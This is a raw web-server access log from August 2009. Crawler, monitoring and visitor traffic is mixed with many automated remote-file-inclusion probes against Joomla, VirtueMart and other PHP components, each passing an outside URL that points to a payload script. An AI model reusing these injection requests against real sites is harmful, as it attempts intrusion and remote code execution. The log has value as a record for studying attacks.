74.6.149.44 - - [02/Aug/2009:06:25:02 -0400] "GET /images/items/EcOm/calciumsulfate_thumb.jpg HTTP/1.0" 200 2715 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)"
116.71.175.141 - - [02/Aug/2009:06:26:01 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
116.71.175.141 - - [02/Aug/2009:06:26:01 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
116.71.175.141 - - [02/Aug/2009:06:26:07 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
116.71.175.141 - - [02/Aug/2009:06:26:07 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
213.171.225.234 - - [02/Aug/2009:06:26:26 -0400] "GET /logs/access_log.Q109061000///vwar/backup/errors.php?error=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
213.171.225.234 - - [02/Aug/2009:06:26:26 -0400] "GET ///vwar/backup/errors.php?error=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
213.171.225.234 - - [02/Aug/2009:06:26:26 -0400] "GET /logs///vwar/backup/errors.php?error=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
209.59.12.99 - - [02/Aug/2009:06:27:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.138.139 - - [02/Aug/2009:06:27:07 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:27:07 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:27:07 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:27:20 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:27:20 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:27:20 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:27:22 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:27:22 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:27:22 -0400] "GET /logs/access_log.Q109051300%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:27:31 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:27:39 -0400] "GET /logs/access_log.Q109061200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:06:27:40 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:06:27:40 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:06:27:40 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:27:51 -0400] "GET /logs/access_log.Q109061200%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
213.171.225.234 - - [02/Aug/2009:06:28:09 -0400] "GET /logs/access_log.Q109052400///vwar/backup/errors.php?error=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
122.201.81.6 - - [02/Aug/2009:06:28:18 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:06:28:18 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:06:28:18 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:06:28:27 -0400] "GET /logs/access_log.Q109051400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:06:28:32 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:06:28:40 -0400] "GET /logs/access_log.Q109051400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:28:48 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:28:48 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:28:48 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:29:03 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://onsoccer.ca/copyme.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
128.121.51.87 - - [02/Aug/2009:06:31:45 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.oxfordstcoop.org/images/stories/id.txt??? HTTP/1.1" 200 12009 "-" "Mozilla/5.0"
128.121.51.87 - - [02/Aug/2009:06:31:45 -0400] "GET /logs/access_log.Q109061100%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.oxfordstcoop.org/images/stories/id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
128.121.51.87 - - [02/Aug/2009:06:31:45 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.oxfordstcoop.org/images/stories/id.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:06:32:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.60.36.242 - - [02/Aug/2009:06:32:21 -0400] "GET //com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://tommymartin.info//project/projects/bot.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
65.60.36.242 - - [02/Aug/2009:06:32:21 -0400] "GET /logs//com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://tommymartin.info//project/projects/bot.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
110.45.138.139 - - [02/Aug/2009:06:33:07 -0400] "GET //ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:33:09 -0400] "GET /logs/access_log.Q109071600//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:33:09 -0400] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:06:33:54 -0400] "GET //?_zb_path=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:06:33:54 -0400] "GET /logs//?_zb_path=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 200 12009 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:06:33:54 -0400] "GET /logs/access_log.Q109070200//?_zb_path=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:34:56 -0400] "GET /logs/access_log.Q109071600%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.6.149.44 - - [02/Aug/2009:06:35:00 -0400] "GET /images/items/EcOm/nuosscollagen_full.jpg HTTP/1.0" 200 10993 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)"
110.45.138.139 - - [02/Aug/2009:06:35:01 -0400] "GET /logs/access_log.Q109071700%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.30.81.182 - - [02/Aug/2009:06:35:13 -0400] "GET /logs/access_log.Q109011300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
128.121.51.87 - - [02/Aug/2009:06:35:24 -0400] "GET /logs/access_log.Q109061100//?_SERVER[DOCUMENT_ROOT]=http://www.oxfordstcoop.org/images/stories/id.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:06:36:14 -0400] "GET /logs/access_log.Q109070200%20%20//?_zb_path=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
74.6.149.44 - - [02/Aug/2009:06:36:46 -0400] "GET /images/items/EcOm/9800045_thumb.jpg HTTP/1.0" 200 1541 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)"
209.59.12.99 - - [02/Aug/2009:06:37:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.138.139 - - [02/Aug/2009:06:38:40 -0400] "GET /logs/access_log.Q109071700//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
128.121.51.87 - - [02/Aug/2009:06:38:46 -0400] "GET /logs/access_log.Q109060100%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.oxfordstcoop.org/images/stories/id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
128.121.51.87 - - [02/Aug/2009:06:38:46 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.oxfordstcoop.org/images/stories/id.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
128.121.51.87 - - [02/Aug/2009:06:38:46 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.oxfordstcoop.org/images/stories/id.txt??? HTTP/1.1" 200 12009 "-" "Mozilla/5.0"
69.245.25.6 - - [02/Aug/2009:06:39:16 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
69.245.25.6 - - [02/Aug/2009:06:39:16 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
69.245.25.6 - - [02/Aug/2009:06:39:17 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
69.245.25.6 - - [02/Aug/2009:06:39:17 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
217.199.222.19 - - [02/Aug/2009:06:39:30 -0400] "GET /logs//?_zb_path=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 200 12009 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:06:39:30 -0400] "GET //?_zb_path=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:06:39:30 -0400] "GET /logs/access_log.Q109063000//?_zb_path=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
141.223.5.11 - - [02/Aug/2009:06:40:43 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://yasmin.ws//blog/hardcore/v8id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
141.223.5.11 - - [02/Aug/2009:06:40:43 -0400] "GET //index.php?DOCUMENT_ROOT=http://yasmin.ws//blog/hardcore/v8id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.245.25.6 - - [02/Aug/2009:06:40:59 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
217.199.222.19 - - [02/Aug/2009:06:41:14 -0400] "GET /logs/access_log.Q109070200//?_zb_path=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.199.222.19 - - [02/Aug/2009:06:41:23 -0400] "GET /logs/access_log.Q109063000%20%20//?_zb_path=http://assess.vet.cmu.ac.th//m1.gif?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
141.223.5.11 - - [02/Aug/2009:06:41:30 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://yasmin.ws//blog/hardcore/v8id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.245.25.6 - - [02/Aug/2009:06:41:34 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
110.45.138.139 - - [02/Aug/2009:06:41:36 -0400] "GET //errors.php?error=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:41:36 -0400] "GET /logs/access_log.Q109071600//errors.php?error=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:41:36 -0400] "GET /logs//errors.php?error=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:06:41:39 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:06:41:39 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:06:41:39 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:06:41:39 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:06:41:41 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:06:41:41 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:06:41:41 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
59.24.49.35 - - [02/Aug/2009:06:41:41 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.hds21.co.kr/bbs/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:41:53 -0400] "GET /logs//errors.php?error=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:41:53 -0400] "GET //errors.php?error=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:41:54 -0400] "GET /logs/access_log.Q109071600//errors.php?error=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:06:42:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.138.139 - - [02/Aug/2009:06:42:15 -0400] "GET /logs/access_log.Q109071700//errors.php?error=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:42:35 -0400] "GET /logs/access_log.Q109071700//errors.php?error=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
141.223.5.11 - - [02/Aug/2009:06:42:40 -0400] "GET //index.php?DOCUMENT_ROOT=http://yasmin.ws//blog/hardcore/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
141.223.5.11 - - [02/Aug/2009:06:42:40 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://yasmin.ws//blog/hardcore/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
141.223.5.11 - - [02/Aug/2009:06:42:40 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://yasmin.ws//blog/hardcore/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
141.223.5.11 - - [02/Aug/2009:06:42:40 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://yasmin.ws//blog/hardcore/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.201 - - [02/Aug/2009:06:42:47 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.201 - - [02/Aug/2009:06:42:47 -0400] "GET /logs/access_log.Q108111000 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.53.201.178 - - [02/Aug/2009:06:42:55 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.53.201.178 - - [02/Aug/2009:06:42:55 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.53.201.178 - - [02/Aug/2009:06:42:55 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.53.201.178 - - [02/Aug/2009:06:43:11 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.53.201.178 - - [02/Aug/2009:06:43:11 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
74.53.201.178 - - [02/Aug/2009:06:43:11 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
74.53.201.178 - - [02/Aug/2009:06:43:17 -0400] "GET /logs/access_log.Q109071600/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:43:19 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:43:19 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 200 12009 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:43:19 -0400] "GET /logs/access_log.Q109071600%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:43:41 -0400] "GET /logs/access_log.Q109071700%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
128.121.51.87 - - [02/Aug/2009:06:44:06 -0400] "GET /logs/access_log.Q109060100//?_SERVER[DOCUMENT_ROOT]=http://www.oxfordstcoop.org/images/stories/id.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
74.53.201.178 - - [02/Aug/2009:06:44:18 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:44:49 -0400] "GET /logs/access_log.Q109071600%20%20//errors.php?error=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:06:44:49 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:44:55 -0400] "GET /logs/access_log.Q109071700%20%20//errors.php?error=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:06:44:55 -0400] "GET /logs/access_log.Q109051400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:06:45:24 -0400] "GET /logs/access_log.Q109051400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:45:42 -0400] "GET /logs/access_log.Q109071600%20%20//errors.php?error=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
94.183.162.45 - - [02/Aug/2009:06:45:45 -0400] "GET /logs/access_log.Q109070900 HTTP/1.1" 200 4950912 "-" "-"
110.45.138.139 - - [02/Aug/2009:06:45:50 -0400] "GET /logs/access_log.Q109071700%20%20//errors.php?error=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:45:54 -0400] "GET /logs/access_log.Q109071600//?_SERVER[DOCUMENT_ROOT]=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
110.45.138.139 - - [02/Aug/2009:06:46:15 -0400] "GET /logs/access_log.Q109071700//?_SERVER[DOCUMENT_ROOT]=http://www.wonie.net/bbs/skin/ggambo7002_board/config/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.245.25.6 - - [02/Aug/2009:06:46:36 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
69.245.25.6 - - [02/Aug/2009:06:46:36 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
69.245.25.6 - - [02/Aug/2009:06:46:39 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
69.245.25.6 - - [02/Aug/2009:06:46:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
209.59.12.99 - - [02/Aug/2009:06:47:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
